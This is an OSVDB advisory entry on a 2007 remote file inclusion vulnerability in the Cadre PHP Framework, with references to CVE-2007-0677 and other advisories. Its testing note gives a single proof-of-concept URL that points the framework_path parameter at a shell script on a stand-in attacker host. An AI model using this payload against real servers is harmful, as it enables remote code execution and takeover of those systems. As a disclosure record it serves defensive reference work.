Cadre PHP Framework fw/class.Quick_Config_Browser.php GLOBALS[config][framework_path] Variable Remote File Inclusion

2007-01-31T01:49:56
ID OSVDB:33631
Type osvdb
Reporter OSVDB
Modified 2007-01-31T01:49:56

Description

Manual Testing Notes

http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=http://attacker/shell.php?

References:

Other Advisory URL: http://echo.or.id/adv/adv63-y3dips-2007.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-01/0691.html ISS X-Force ID: 32005 Generic Exploit URL: http://www.milw0rm.com/exploits/3237 FrSIRT Advisory: ADV-2007-0449 CVE-2007-0677 Bugtraq ID: 22336